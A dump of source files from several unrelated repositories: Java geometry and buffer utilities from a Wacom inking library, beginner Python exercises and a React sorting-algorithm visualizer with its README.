cnt + "]" + line); } } public static void copyFloatBuffer(FloatBuffer source, FloatBuffer destination, int sourcePosition, int destinationPosition, int size){ if (sourcePosition>=0){ source.position(sourcePosition); } if (destinationPosition>=0){ destination.position(destinationPosition); } for (int i=0;i<size;i++){ destination.put(source.get()); } } public static float getFloatBufferPointValue(FloatBuffer buffer, int position, int pointIndex, int stride, int channel){ return buffer.get(position + pointIndex*stride + channel); } public static void fillPath(Path path, FloatBuffer buffer, int size, int stride, int position){ fillPath(path, buffer, size, stride, position, 0, 1); } public static void fillPath(Path path, FloatBuffer buffer, int size, int stride, int position, int x, int y){ path.reset(); int n = size/stride; for (int i = 1; i<n-2; i++){ if (i==1){ path.moveTo(getFloatBufferPointValue(buffer, position, i, stride, x), getFloatBufferPointValue(buffer, position, i, stride, y)); } if (i<n-3){ //CatmullRom to bezier float bufferX[] = {getFloatBufferPointValue(buffer, position, i+0, stride, x), getFloatBufferPointValue(buffer, position, i+1, stride, x), getFloatBufferPointValue(buffer, position, i+2, stride, x), getFloatBufferPointValue(buffer, position, i+3, stride, x)}; float bufferY[] = {getFloatBufferPointValue(buffer, position, i+0, stride, y), getFloatBufferPointValue(buffer, position, i+1, stride, y), getFloatBufferPointValue(buffer, position, i+2, stride, y), getFloatBufferPointValue(buffer, position, i+3, stride, y)}; float one6th = 0.166666666666f; float bx1 = -one6th * bufferX[0] + bufferX[1] + one6th * bufferX[2]; float bx2 = +one6th * bufferX[1] + bufferX[2] - one6th * bufferX[3]; float bx3 = bufferX[2]; float by1 = -one6th * bufferY[0] + bufferY[1] + one6th * bufferY[2]; float by2 = +one6th * bufferY[1] + bufferY[2] - one6th * bufferY[3]; float by3 = bufferY[2]; path.cubicTo(bx1, by1, bx2, by2, bx3, by3); } if (i==n-3){ path.close(); } } } static public <T> void addAllToList(List<T> source, List<T> destination){ for (T item: source){ if (!destination.contains(item)){ destination.add(item); } } } static public int resGetInt(Context context, int resId){ return context.getResources().getInteger(resId); } public static double calcDistance(float x1, float y1, float x2, float y2) { return Math.sqrt((x1-x2)*(x1-x2) + (y1-y2)*(y1-y2)); } private static int NEXT_FILENAME_IDX = 0; public static String generateUniqueString(){ NEXT_FILENAME_IDX = (NEXT_FILENAME_IDX+1)==100?NEXT_FILENAME_IDX=0:NEXT_FILENAME_IDX+1; return System.currentTimeMillis() + "-" + 10000 + (int)(Math.random()*9999) + "-" + 1000 + NEXT_FILENAME_IDX; } public int convertColorComponentToInt(float component){ return (int)(component * 0xFF); } public int convertARGBFloatComponentsToIntColor(float a, float r, float g, float b){ return convertARGBIntComponentsToIntColor(convertColorComponentToInt(a), convertColorComponentToInt(r), convertColorComponentToInt(g), convertColorComponentToInt(b)); } public int convertARGBIntComponentsToIntColor(int a, int r, int g, int b){ a = (a << 24) & 0xFF000000; r = (r << 16) & 0x00FF0000; g = (g << 8) & 0x0000FF00; b = b & 0x000000FF; return a | r | g | b; } public static int convertIntARGBColorToIntRGBColor(int intARGBColor){ return intARGBColor & 0x00FFFFFF; } public static int convertIntRGBColorToIntARGBColor(int intRGBColor) { return intRGBColor | 0xFF000000; } public static int convertIntARGBColorToIntRGBAColor(int intARGBColor){ return ((intARGBColor&0xff000000)>>>24) | ((intARGBColor&0x00ffffff)<<8); } public static int convertIntRGBAColorToIntARGBColor(int intRGBAColor) { return ((intRGBAColor&0xffffff00)>>>8) | ((intRGBAColor&0xff)<<24); } public static int premultiplyIntColor(int color) { return Color.argb(Color.alpha(color), mul255(Color.red(color), Color.alpha(color)), mul255(Color.green(color), Color.alpha(color)), mul255(Color.blue(color), Color.alpha(color))); } private static int mul255(int c, int a) { int prod = c * a + 128; return (prod + (prod >> 8)) >> 8; } public static int premultiplyColor(int c) { int r = Color.red(c); int g = Color.green(c); int b = Color.blue(c); int a = Color.alpha(c); // now apply the alpha to r, g, b r = mul255(r, a); g = mul255(g, a); b = mul255(b, a); // now pack it in the correct order return pack8888(r, g, b, a); } private static int pack8888(int r, int g, int b, int a) { return (r << 0) | ( g << 8) | (b << 16) | (a << 24); } public static void invalidateRectF(RectF rect){ rect.left = Float.NaN; rect.right = Float.NaN; rect.top = Float.NaN; rect.bottom = Float.NaN; } public static void uniteWith(RectF rect, RectF uniteWithRect){ if (Float.isNaN(rect.left)){ rect.left = uniteWithRect.left; } else { rect.left = Math.min(rect.left, uniteWithRect.left); } if (Float.isNaN(rect.right)){ rect.right = uniteWithRect.right; } else { rect.right = Math.max(rect.right, uniteWithRect.right); } if (Float.isNaN(rect.top)){ rect.top = uniteWithRect.top; } else { rect.top = Math.min(rect.top, uniteWithRect.top); } if (Float.isNaN(rect.bottom)){ rect.bottom = uniteWithRect.bottom; } else { rect.bottom = Math.max(rect.bottom, uniteWithRect.bottom); } } public static boolean saveBinaryFile(Uri uri, ByteBuffer buffer, int position, int size){ File file = new File(uri.getPath()); if (file.exists()){ file.delete(); } OutputStream out = null; boolean bSuccess = true; try { out = new FileOutputStream(file); byte[] buf = new byte[256*1024]; buffer.position(0); int len; while (buffer.position()<buffer.limit()-1){ len = Math.min(buf.length, buffer.remaining()); buffer.get(buf, 0, len); out.write(buf, 0, len); } out.close(); } catch (FileNotFoundException e) { e.printStackTrace(); bSuccess = false; } catch (IOException e) { e.printStackTrace(); bSuccess = false; } finally { try { out.close(); } catch (Exception e) { e.printStackTrace(); } out = null; } return bSuccess; } public static ByteBuffer loadBinaryFile(InputStream in){ ByteBuffer buffer = null; ByteArrayOutputStream os = new ByteArrayOutputStream(); boolean bSuccess = true; try { byte[] buf = new byte[256*1024]; int len; while ((len = in.read(buf)) > 0) { os.write(buf, 0, len); } in.close(); } catch (FileNotFoundException e) { e.printStackTrace(); bSuccess = false; } catch (IOException e) { e.printStackTrace(); bSuccess = false; } finally { Log.e("BUF", "BUFFER222: " + os.toByteArray().length); buffer = Utils.createNativeByteBuffer(os.toByteArray()); try { in.close(); } catch (Exception e) { e.printStackTrace(); } try { os.close(); } catch (Exception e) { e.printStackTrace(); } } return bSuccess?buffer:null; } public static ByteBuffer loadBinaryFile(Uri uri){ return loadBinaryFile(uri, null, 0); } public static ByteBuffer loadBinaryFile(Uri uri, ByteBuffer optionalInBuffer, int optionalPosition){ File file = new File(uri.getPath()); if (!file.exists()){ return null; } ByteBuffer buffer = null; InputStream in = null; boolean bSuccess = true; try { in = new FileInputStream(file); byte[] buf = new byte[256*1024]; int len; buffer = Utils.reallocNativeByteBuffer(optionalInBuffer, optionalPosition + (int)file.length()); buffer.position(0); while ((len = in.read(buf)) > 0) { buffer.put(buf, 0, len); } in.close(); } catch (FileNotFoundException e) { e.printStackTrace(); bSuccess = false; } catch (IOException e) { e.printStackTrace(); bSuccess = false; } finally { try { in.close(); } catch (Exception e) { e.printStackTrace(); } in = null; } return bSuccess?buffer:null; } }<file_sep>/* * Created by <NAME>. * Copyright (c) 2014 Wacom. All rights reserved. */ package com.wacom.ink.geometry; public class WVec2 { public float x; public float y; public float z; /** * @hide */ public long handle; private native long nativeInitialize(); private native void nativeFinalize(long handle); private native float nativeGetX(long handle); private native float nativeGetY(long handle); private native void nativeSetX(long handle, float value); private native void nativeSetY(long handle, float value); public WVec2(){ this(0, 0); } public WVec2(float x, float y) { handle = nativeInitialize(); set(x, y); } public float getX(){ return nativeGetX(handle); } public float getY(){ return nativeGetY(handle); } public void setX(float value){ nativeSetX(handle, value); } public void setY(float value){ nativeSetY(handle, value); } public void set(float x, float y){ setX(x); setY(y); } public void setInf(){ setX(Float.POSITIVE_INFINITY); setY(Float.POSITIVE_INFINITY); } @Override protected void finalize() throws Throwable { super.finalize(); nativeFinalize(handle); } static { System.loadLibrary("InkingEngine"); } } <file_sep>/* * Created by <NAME>. * Copyright (c) 2014 Wacom. All rights reserved. */ package com.wacom.ink.utils; /** * Class containing utility functions for matrix operations. * */ import android.graphics.Matrix; public class Mx{ private static Logger logger = new Logger(Mx.class); public static float transformPtX(Matrix mx, float x){ float[] pts = new float[]{x, 0}; mx.mapPoints(pts); return pts[0]; } public static float transformPtY(Matrix mx, float y){ float[] pts = new float[]{0, y}; mx.mapPoints(pts); return pts[1]; } public static float[] convertToRowMajor4x4Matrix(float[] mx4x4, float[] mx3x3){ mx4x4[0] = mx3x3[0]; mx4x4[1] = mx3x3[1]; mx4x4[2] = mx3x3[2]; mx4x4[3] = 0; mx4x4[4] = mx3x3[3]; mx4x4[5] = mx3x3[4]; mx4x4[6] = mx3x3[5]; mx4x4[7] = 0; mx4x4[8] = mx3x3[6]; mx4x4[9] = mx3x3[7]; mx4x4[10] = mx3x3[8]; mx4x4[11] = 0; mx4x4[12] = 0; mx4x4[13] = 0; mx4x4[14] = 0; mx4x4[15] = 1; return mx4x4; } public static void limitMatrix(Matrix mx, float minS, float maxS, float width, float height){ float[] v = new float[9]; mx.getValues(v); boolean bFixed = false; if (Logger.LOG_ENABLED) logger.i("LIMIT_MATRIX before fix: " + mx.toShortString()); if (v[Matrix.MSCALE_X]>maxS){ mx.postScale(maxS/v[Matrix.MSCALE_X], maxS/v[Matrix.MSCALE_X], width/2, height/2); if (Logger.LOG_ENABLED) logger.i("LIMIT_MATRIX limit scale: " + v[Matrix.MSCALE_X] + ">" + maxS); bFixed = true; } if (v[Matrix.MSCALE_X]<minS){ mx.postScale(minS/v[Matrix.MSCALE_X], minS/v[Matrix.MSCALE_X], width/2, height/2); if (Logger.LOG_ENABLED) logger.i("LIMIT_MATRIX limit scale: " + v[Matrix.MSCALE_X] + "<" + minS); bFixed = true; } if (Mx.transformPtX(mx, 0)>0){ mx.postTranslate(-Mx.transformPtX(mx, 0), 0); if (Logger.LOG_ENABLED) logger.i("LIMIT_MATRIX fix translation (1)"); bFixed = true; } if (Mx.transformPtY(mx, 0)>0){ mx.postTranslate(0, -Mx.transformPtY(mx, 0)); if (Logger.LOG_ENABLED) logger.i("LIMIT_MATRIX fix translation (2)"); bFixed = true; } if (Mx.transformPtX(mx, width)<width){ mx.postTranslate(width - Mx.transformPtX(mx, width), 0); if (Logger.LOG_ENABLED) logger.i("LIMIT_MATRIX fix translation (3)"); bFixed = true; } if (Mx.transformPtY(mx, height)<height){ mx.postTranslate(0, height - Mx.transformPtY(mx, height)); if (Logger.LOG_ENABLED) logger.i("LIMIT_MATRIX fix translation (4)"); bFixed = true; } if (bFixed){ if (Logger.LOG_ENABLED) logger.i("LIMIT_MATRIX after fix: " + mx.toShortString()); } } public static float[] convertToColumnMajor4x4Matrix(float[] mx4x4, float[] mx3x3){ mx4x4[0] = mx3x3[0]; mx4x4[4] = mx3x3[1]; mx4x4[8] = mx3x3[2]; mx4x4[12] = 0; mx4x4[1] = mx3x3[3]; mx4x4[5] = mx3x3[4]; mx4x4[9] = mx3x3[5]; mx4x4[13] = 0; mx4x4[2] = mx3x3[6]; mx4x4[6] = mx3x3[7]; mx4x4[10] = mx3x3[8]; mx4x4[14] = 0; mx4x4[3] = 0; mx4x4[7] = 0; mx4x4[11] = 0; mx4x4[15] = 1; return mx4x4; } public static float[] convertTo4x4Matrix(float[] mx4x4, float[] mx3x3){ mx4x4[0] = mx3x3[0]; mx4x4[1] = mx3x3[1]; mx4x4[2] = 0; mx4x4[3] = mx3x3[2]; mx4x4[4] = mx3x3[3]; mx4x4[5] = mx3x3[4]; mx4x4[6] = 0; mx4x4[7] = mx3x3[5]; mx4x4[8] = 0; mx4x4[9] = 0; mx4x4[10] = 1; mx4x4[11] = 0; mx4x4[12] = mx3x3[6]; mx4x4[13] = mx3x3[7]; mx4x4[14] = 0; mx4x4[15] = mx3x3[8]; mx4x4[0] = mx3x3[Matrix.MSCALE_X]; mx4x4[1] = mx3x3[Matrix.MSKEW_X]; mx4x4[2] = 0; mx4x4[3] = mx3x3[Matrix.MTRANS_X]; mx4x4[4] = mx3x3[Matrix.MSKEW_Y]; mx4x4[5] = mx3x3[Matrix.MSCALE_Y]; mx4x4[6] = 0; mx4x4[7] = mx3x3[Matrix.MTRANS_Y]; mx4x4[8] = 0; mx4x4[9] = 0; mx4x4[10] = 1; mx4x4[11] = 0; mx4x4[12] = 0; mx4x4[13] = 0; mx4x4[14] = 0; mx4x4[15] = 1; // for (int r=0;r<3;r++){ // Log.e("convertTo4x4Matrix", "3x3 | mx[" + r+ "] " + mx3x3[r*3] + " " + mx3x3[r*3+1] + " " + mx3x3[r*3+2]); // } // // for (int r=0;r<4;r++){ // Log.e("convertTo4x4Matrix", "4x4 | mx[" + r+ "] " + mx4x4[r*4] + " " + mx4x4[r*4+1] + " " + mx4x4[r*4+2] + " " + mx4x4[r*4+3]); // } return mx4x4; } public static float getScaleFactorX(Matrix mx){ float[] v = new float[9]; mx.getValues(v); return v[Matrix.MSCALE_X]; } }
7ca92460df68d9933362656accc65c939591015c
[ "Java" ]
20
Java
orsinil/com.phonegap.will.simple
5c7671c5d659d5620fd198046c11693e80ae533c
07c6ec0ce0d172bdd4ccf9ad564fa5275981ac76
refs/heads/master
<repo_name>MulajEgzon/test<file_sep>/test.c deri qitash banum hajgare hajde tash punojm pernime .c.c.c.c.c.
2b902bc06616ea499fa3645d837a14c4abdf5073
[ "C" ]
1
C
MulajEgzon/test
b1dd76fc08e6d814f1d13dc3684a118a6b5a1e0b
ac8cd2a5a3da84741b36ea7747e1e9d4b789e98b
refs/heads/master
<repo_name>rafaelcardoso31101995/treinamento_git<file_sep>/aula07-praticando.py n1 = int(input('Digite o primeiro valor: ')) n2 = int(input('Outro valor: ')) s = n1 + n2 m = n1 * n2 d = n1 / n2 di = n1 // n2 p = n1 ** n2 print('A soma é {}, a multiplicação é {}, a divisão é {}, a divisão inteiro é {}, a potência é {}'.format(s,m,d,di,p)) <file_sep>/aula08-desafio19-guanabara.py import random n1 = str(input('Primeiro aluno: ')) n2 = str(input('Segundo aluno: ')) n3 = str(input('Terceiro aluno: ')) n4 = str(input('Quarto aluno: ')) lista = [n1, n2, n3, n4] escolhido = random.choice(lista) """ Nesse caso o random.choice aceita que você ponha uma lista como ([n1,n2,n3,n4]) ou uma variavel com a lista dentro """ print('O aluno escolhido foi {}'.format(escolhido)) <file_sep>/aula09-desafio25.py name = str(input('Digite o seu nome: ')) name_upper = name.upper() result = 'SILVA' in name_upper print(result) <file_sep>/aula10-desafio32.py year = int(input('Digite o ano(Sem caracter especial entre os números: )')) if year%4 == 0 and year%400 == 0: print('O ano é bissexto.') else: print('O ano não é bissexto.') <file_sep>/aula08-desafio18.py import math angulo = float(input('Digite o valor do angulo: ')) seno = math.sin(math.radians(angulo)) cosseno = math.cos(math.radians(angulo)) tangente = math.tan(math.radians(angulo)) print('O seno do angulo {} é {:.2f}'.format(angulo, seno)) print('O cosseno do angulo {} é {:.2f}'.format(angulo, cosseno)) print('A tangente do angulo {} é {:.2f}'.format(angulo, tangente)) <file_sep>/aula09-desafio23.py number = str(input('Digite um número: ')) length = len(number) if length == 1: print('Unidade: {}'.format(number[0])) if length == 2: unidade = number[1] dezena = number[0] print('Unidade: {}'.format(unidade)) print('Dezena: {}'.format(dezena)) if length == 3: unidade = number[2] dezena = number[1] centena = number[0] print('Unidade: {}\nDezena: {}\nCentena: {}'.format(unidade, dezena, centena)) if length == 4: unidade = number[3] dezena = number[2] centena = number[1] milhar = number[0] print('Unidade: {}\nDezena: {}\nCentena: {}\nMilhar: {}'.format(unidade, dezena, centena, milhar)) <file_sep>/aula07-desafio11.py width = float(input('Digite a largura: ')) height = float(input('Digite a altura: ')) area = width * height liters = area/2 print('A quantidade de tinta para pintar uma area de {} metros quadrados é {} litros'.format(area, liters)) <file_sep>/aula10-desafio34.py salary = float(input('Digite o seu salário: ')) if salary >= 1250.00: print('O seu novo salário com aumento de 10% é: {}'.format(salary + (salary*(10/100)))) elif salary < 1250.00: print('O seu novo salário com aumento de 15% é: {}'.format(salary + (salary*(15/100)))) <file_sep>/segundoBoss.py dia = input('Digite o dia: ') mes = input('Digite o mês: ') ano = input('Digite o ano: ') print(dia,'/',mes,'/',ano) <file_sep>/aula07-desafio10.py choose = int(input('1 - Dollar\n2 - Euros\n3 - Pesos\n:')) real = float(input('Digite o valor em reais: ')) dollar = 3.74 euro = 4.23 peso = 0.096 if choose == 1: dollares = real/dollar print('O valor em dollar é: {:.2f}'.format(dollar)) elif choose == 2: euros = real/euro print('O valor em euros é: {:.2f}'.format(euros)) elif choose == 3: pesos = real/peso print(f"O valor em pesos é: {pesos:.2f}") <file_sep>/aula07-desafio06.py n1 = int(input('Digite um valor: ')) dobro = n1*2 triplo = n1*3 raiz = n1**(1/2) print('O dobro é: {} O triplo é: {} A raiz quadrada é {}'.format(dobro, triplo, raiz)) <file_sep>/aula09-desafio26.py frase = str(input('Digite uma frase: ')) frase_upper = frase.upper() amount = frase_upper.count('A') find_result = frase_upper.find('A') print('A quantidade de A que tem na frase é {}'.format(amount)) print('O primeira A aparece na posição {}'.format(find_result)) #Nesse caso o find mostra somente a posição da primeira letra encontrada"i print('A ultima ocorrencia de A aparece na posição {}'.format(frase_upper.rfind('A'))) <file_sep>/aula06-desafio4.py n1 = input('Digite qualquer coisa') print(type(n1)) <file_sep>/aula08-desafio19.py import random first_name = input('Digite o primeiro nome: ') second_name = input('Digite o segundo nome: ') third_name = input('Digite o terceiro nome: ') name = random.choice([first_name, second_name, third_name]) print('O nome escolhido foi {}'.format(name)) <file_sep>/usandoFormat.py n1 = int(input('Digite o valor do primeiro numero')) n2 = int(input('Digite o valor do segundo numero')) soma = (n1 + n2) print('A soma entre ',n1, ' e ',n2, 'é', soma) print('A soma entre {} e {} é {}'.format(n1,n2,soma)) <file_sep>/aula10-desafio28.py import random num_random = random.randint(0,5) num_user = int(input('Digite um número entre 0 e 5: ')) if num_user == num_random: print('Você acertou!!!!') else: print('Você errou!!!') print('O número que a máquina escolheu foi: {}'.format(num_random)) <file_sep>/projeto_git2.py real = float(input('Digite o total em reais que você tem: ')) dollar = real/3.27 print('O valor em reais é {:.3f}'.format(dollar)) <file_sep>/biblioteca_math.py import math num = int(input('Digite um numero: ')) raiz = math.sqrt(num) print('O valor digitado foi {} e a sua raiz é {:.2f}'.format(num, raiz)) <file_sep>/aula07-desafio08.py valor = float(input('Digite um valor em metros: ')) v_centimetros = valor*100 v_milimetros = valor*1000 print('Esse é o valor em centimetros é {} e em milimetros é {} '.format(v_centimetros, v_milimetros)) <file_sep>/aula09-desafio22.py name = str(input('Digite o seu nome completo: ')) print('{}'.format(name.upper())) print('{}'.format(name.lower())) print('{}'.format(len(name))) name_nobar = name.replace(' ', '') length = len(name_nobar) print('{}'.format(length)) name_list = name.split() first_name = name_list[0] print('{}'.format(len(first_name))) <file_sep>/aula07-desafio05.py n1 = int(input('Digite um valor: ')) print('O valor é {}, o valor anterior é {} e o valor sucessor é {}'.format(n1, n1-1, n1+1)) <file_sep>/aula08-desafio17.py import math cateto = float(input('Digite o valor do cateto: ')) cateto_oposto = float(input('Digite o valor do cateto oposto: ')) hipotenuse = math.sqrt(math.pow(cateto, 2) + math.pow(cateto_oposto, 2)) print('O valor da hipotenusa é {}'.format(hipotenuse)) <file_sep>/aula07-desafio13.py salary = float(input('Digite o seu salario: ')) salary_increase = salary * (15/100) new_salary = salary + salary_increase print('O almento no salario foi de {} e o seu novo salario é {}'.format(salary_increase, new_salary)) <file_sep>/aula06-desafio3-plus.py n1 = int(print('Digite o primeiro valor: ')) n2 = int(print('Digite o segundo valor: ')) resultado = n1 + n2 print('A soma entre {} e {} é {}'.format(n1,n2,resultado)) <file_sep>/aula10-desafio31.py km = float(input('Digite a distância em quilometros: ')) if km <= 200: total = km * 0.50 print('A sua viagem vai custar: {}'.format(total)) else: total = km * 0.45 print('A sua viagem vai custar: {}'.format(total)) <file_sep>/projeto_git.py number = int(input('Escreva um numero inteiro: ')) print('1 * {} = {}'.format(number, number*1)) print('2 * {} = {}'.format(number, number*2)) print('3 * {} = {}'.format(number, number*3)) print('4 * {} = {}'.format(number, number*4)) print('5 * {} = {}'.format(number, number*5)) print('6 * {} = {}'.format(number, number*6)) print('7 * {} = {}'.format(number, number*7)) print('8 * {} = {}'.format(number, number*8)) print('9 * {} = {}'.format(number, number*9)) print('10 * {} = {}'.format(number, number*10)) <file_sep>/aula10-desafio29.py km = float(input('Digite a velocidade em KM: ')) if km > 80.0: total = (km - 80.0) * 7 print('Você foi multado e deve pagar: {}'.format(total)) <file_sep>/aula09-desafio24.py city = str(input('Digite o nome da sua cidade: ')) splited_name = city.split() first_name = splited_name[0] first_name = first_name.upper() test = first_name.find('SANTO') if test != -1: print('A sua cidade começa com SANTO') else: print('A sua cidade não começa com SANTO') <file_sep>/aula08-desafio16.py from math import trunc number = float(input('Digite um número com vírgula: ')) number_truncated = trunc(number) print('A parte inteira do valor é: {}'.format(number_truncated)) <file_sep>/aula07-desafio12.py product = float(input('Digite o preço do produto: ')) descount = product * (5/100) product_descounted = product - descount print('O desconto de 5% sobre o preço original do produto, {}, foi {} e o novo preço é {}'.format(product, descount, product_descounted)) <file_sep>/aula07-desafio09.py num = int(input('Digite numero que você deseja a tabuada: ')) i = 1 while i <= 10: print('{} x {} = {}'.format(num, i, (num*i))) i = i + 1 <file_sep>/olamundo.py nome = "<NAME>" idade = 23 peso = 68.5 print(nome,idade,peso) <file_sep>/testedeinput.py nome = input('Qual o seu nome?') idade = input('Qual a sua idade?') peso = input('Qual o seu peso?') print('O seu nome é ',nome,' e você tem ' ,idade, ' anos de idade e seu peso é ' ,peso ,'.') <file_sep>/loop_for.py """ Utilizando for loop O laço for só pode ser uzado com iteraveis(lista, dicionarios, tuplas, string...) ex: name = "Rafael" for c in name: print(c) """ name = 'Rafael' for c in name: # Percorre cada letra e printa print(c) # O for loop funciona como o for each no java <file_sep>/aula09-desafio27.py name = str(input('Digite o seu nome: ')) name_list = name.split() length = len(name_list) print('{}'.format(name)) print('Primeiro: {}'.format(name_list[0])) print('Ultimo: {}'.format(name_list[length-1])) <file_sep>/testando_sys.py import sys x = sys.argv[1:] a ='' for c in x: a += c + ' ' print(a) <file_sep>/biblioteca_math2.py from math import sqrt, ceil num = int(input('Digite um valor: ')) raiz = sqrt(num) print('O valor digitado foi {} e sua raiz arredondada é {}'.format(num, ceil(raiz))) <file_sep>/aula10-desafio33.py n1 = float(input('Digite o primeiro número: ')) n2 = float(input('Digite o segundo número: ')) n3 = float(input('Digite o terceiro número: ')) maior = 0 if n1 > n2 and n1 > n3: print('O primeiro número é o maior número: {}'.format(n1)) if n2 > n1 and n2 > n3: print('O segundo número é o maior número: {}'.format(n2)) if n3 > n1 and n3 > n2: print('O segundo número é o maior número: {}'.format(n3)) <file_sep>/if_else_statement.py x = 10 if x <= 10: print('Valor ok') else: print('Valor não baixo')
2ce4c1a6a90cb07e406a143a11d453fcfd64b9a1
[ "Python" ]
39
Python
rafaelcardoso31101995/treinamento_git
b191a0ec139527423de1af6aba129872dd13fe6b
0892fdc4ee2de5baeac5bf05c32d113268928572
refs/heads/master
<file_sep>// check off specific todo by clicking $('ul').on('click', 'li', function() { // click does not work in this case because the future appended li would not be updated at all, which means that it would not be possible to make it completed! // to get the on click valid for all li to be appended in the future, the listener must be on the parent already exiting when the page load!! $(this).toggleClass('completed'); }); $('ul').on('click', 'span', function(event) { // to get the on click valid for all span in appended li in the future, the listener must be on the parent already exiting when the page load!! // click does not work in this case because the future appended li would not be updated at all, which means that it would not be possible to delete it! $(this) .parent() // means that we are on the li to remove the entire li and not the X from the span only .fadeOut(500, function() { $(this).remove(); }); event.stopPropagation(); // span is multi-layered so the event will happen on span but also on li, ul, container, body !! To stop that we need to use stopPropagation() on event }); $('input[type="text"]').keypress(function(event) { if (event.which == 13) { let todoText = $(this).val(); $(this).val(''); $('ul').append( '<li><span><i class="fa fa-trash-alt"></i></span> ' + todoText + '</li>' ); } }); $('span').click(function() { $('input[type="text"]').fadeToggle(); }); <file_sep># UDEMY_jQuery_TodoList UDEMY_jQuery_TodoList_Practice
4c3f7b3ee85de0d739cb4894d5389a4ecc1a1a46
[ "JavaScript", "Markdown" ]
2
JavaScript
Catevika/UDEMY_jQuery_TodoList
61a259739d47d1fc479103b07ed8453d988855b0
38f872051aacc3c39ecf8cc4c2dfb261c0c8e5d9
refs/heads/main
<file_sep>export default function MergeSort(array) { return; }<file_sep>export default function QuickSort(array, steps) { return; }<file_sep>import React from 'react'; import BubbleSort from './Algorithms/BubbleSort'; import MergeSort from './Algorithms/MergeSort'; import QuickSort from './Algorithms/QuickSort'; import './App.css'; import Column from './Components/Column'; const BUBBLE_SORT = 'BubbleSort'; const QUICK_SORT = 'QuickSort'; const MERGE_SORT = 'MergeSort'; const STARTING_LENGTH = 25; const STARTING_SPEED = 1; export default class App extends React.Component { constructor(props) { super(props); this.sort = this.sort.bind(this); this.setSteps = this.setSteps.bind(this); this.animateSteps = this.animateSteps.bind(this); this.state = { array: [], steps: [], colors: [], colorStep: [], algorithm: BUBBLE_SORT, length: STARTING_LENGTH, speed: STARTING_SPEED, } } ALGO = { 'BubbleSort': BubbleSort, 'QuickSort': QuickSort, 'MergeSort': MergeSort }; componentDidMount() { this.generateArray(); } generateArray() { let array = []; let colorStep = []; for (let i = 0; i < this.state.length; i++) { let rand = Math.random()*50; array.push(Math.floor(rand)); colorStep.push("#A5E5D9"); } this.setState({ array: array, colorStep: [...colorStep] }, () => this.setSteps()); } setAlgorithm(algo) { this.setState({ algorithm: algo }, () => this.setSteps()); } setLength(length) { if (this.state.length !== length) { this.setState({ length: length }, () => { this.generateArray(); this.setSteps(); }); } } setSpeed(speed) { this.setState({ speed: speed }); } setSteps() { let array = this.state.array; let steps = this.state.steps; let colors = this.state.colors; this.ALGO[this.state.algorithm](array, steps, colors); this.setState({ steps: steps, colors: colors }); } animateSteps() { for (let i = 0; i < this.state.steps.length; i++) { setTimeout(() => { this.setState({ array: this.state.steps[i], colorStep: this.state.colors[i] }); }, (200/this.state.speed) * i); } } sort() { this.animateSteps(); } render() { let columns = this.state.array.map((value, index) => <Column key={index} value={value} color={this.state.colorStep[index]} />); return ( <div className="App"> <h1>Sorting Algorithm Visualizer</h1> <div className="options"> <div className="block algo"> <h3>Algorithm</h3> <button className={this.state.algorithm === BUBBLE_SORT ? 'active' : ''} onClick={() => this.setAlgorithm(BUBBLE_SORT)}>Bubble Sort</button> <button className={this.state.algorithm === QUICK_SORT ? 'active' : ''} onClick={() => this.setAlgorithm(QUICK_SORT)} disabled>Quick Sort</button> <button className={this.state.algorithm === MERGE_SORT ? 'active' : ''} onClick={() => this.setAlgorithm(MERGE_SORT)} disabled>Merge Sort</button> </div> <div className="block length"> <h3>Size</h3> <button className={this.state.length === 25 ? 'active' : ''} onClick={() => this.setLength(25)}>25</button> <button className={this.state.length === 50 ? 'active' : ''} onClick={() => this.setLength(50)}>50</button> <button className={this.state.length === 75 ? 'active' : ''} onClick={() => this.setLength(75)}>75</button> </div> <div className="block speed"> <h3>Speed</h3> <button className={this.state.speed === 1 ? 'active' : ''} onClick={() => this.setSpeed(1)}>1x</button> <button className={this.state.speed === 2 ? 'active' : ''} onClick={() => this.setSpeed(2)}>2x</button> <button className={this.state.speed === 3 ? 'active' : ''} onClick={() => this.setSpeed(3)}>3x</button> </div> <div className="block algo"> <button onClick={this.generateArray.bind(this)}>Generate New Array</button> <button onClick={this.sort}>Sort!</button> </div> </div> <div className="columns"> {columns} </div> </div> ); } } <file_sep># Sorting Algorithm Visualizer This web application was built using React. It provides a visual of various common sorting algorithms such as bubble sort, merge sort, and quick sort. This web app was deployed using Github Pages, and the live version can be viewed at: https://alyssadicarlo.github.io/sorting-visualizer/ ![Sorting Algorithm Preview](https://github.com/alyssadicarlo/sorting-visualizer/blob/main/src/Assets/preview.png?raw=true) # TO DO: - [x] Deploy using Github Pages - [x] Mobile friendly UI - [x] Easy to use UI - [x] Bubble sort algorithm - [ ] Quick sort algorithm - [ ] Merge sort algoritm - [x] Color coding sorting steps - [x] Change size of array - [x] Change speed of sort - [x] Generate new random array - [ ] Bug fixes # Usage: - Clone repository - Run `yarn install` in command line to install dependencies - Run `yarn start` & open http://localhost:3000/ to view it in the browser <file_sep>const BubbleSort = (inputArr, arraySteps, colorSteps) => { let array = [...inputArr]; let len = array.length; let colors = new Array(len).fill("#A5E5D9"); for (let i =0; i < len; i++) { for (let j = 0; j < len - i - 1; j++) { if (array[j] > array[j+1]) { let temp = array[j]; array[j] = array[j+1]; array[j+1] = temp } colors[j] = "gray"; colors[j+1] = "gray"; arraySteps.push([...array]); colorSteps.push([...colors]); colors[j] = "#A5E5D9"; colors[j+1] = "#A5E5D9"; } colors[len - i - 1] = "green"; colorSteps[-1] = colors; } colorSteps[colorSteps.length - 1] = new Array(len).fill("green"); }; export default BubbleSort;<file_sep>import React from 'react'; import './Column.css'; export default class Column extends React.Component { render() { let columnStyle = { height: "" + (this.props.value*5) + "px", backgroundColor: this.props.color } return( <div className="column" style={columnStyle}></div> ); } }
5692bf4c827d383f3b989d31d6acdd2c14acc965
[ "JavaScript", "Markdown" ]
6
JavaScript
alyssadicarlo/sorting-visualizer
5cb5fcb2e9a6d5b0d3b220a883ec16228188746d
b0dd2c98ac5515c7f9bda70989d228463f606680
refs/heads/master
